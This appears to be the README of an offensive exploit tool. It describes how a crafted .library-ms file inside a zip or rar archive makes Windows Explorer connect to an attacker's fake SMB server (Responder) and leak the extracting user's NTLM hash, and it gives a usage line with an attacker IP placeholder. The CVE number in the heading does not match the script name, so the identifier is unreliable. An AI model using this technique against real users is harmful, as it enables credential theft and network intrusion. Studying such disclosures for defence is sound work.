0xVoodoo
21 lines
866 B
Markdown
21 lines
866 B
Markdown
# CVE-2023-24071 - Windows Explorer NTLM Hash Disclosure
|
|
|
|
This exploit abuses the way Windows Explorer handles library files that have been extracted from an archive (.zip, .rar, etc.).
|
|
When an archive containing a library is decompressed, Explorer will automatically attempt a connection to the URL specified in the library.
|
|
|
|
This means that we can set up responder and listen for a connection back to our fake SMB server, disclosing the hash of the user who extracted the archive.
|
|
|
|
User interaction is required as the archive file must be opened for the connection to be made.
|
|
|
|
# Usage
|
|
|
|
CVE-2025-2401.py -s <attacker IP/domain> -f <output file name>
|
|
-l <library name> Renames the library file (default mal.library-ms)
|
|
|
|
# License
|
|
GPL v3.0 - as all good software should be
|
|
|
|
Only with explicit permission from the target system owner.
|
|
|
|
Remember - don't be a skid :)
|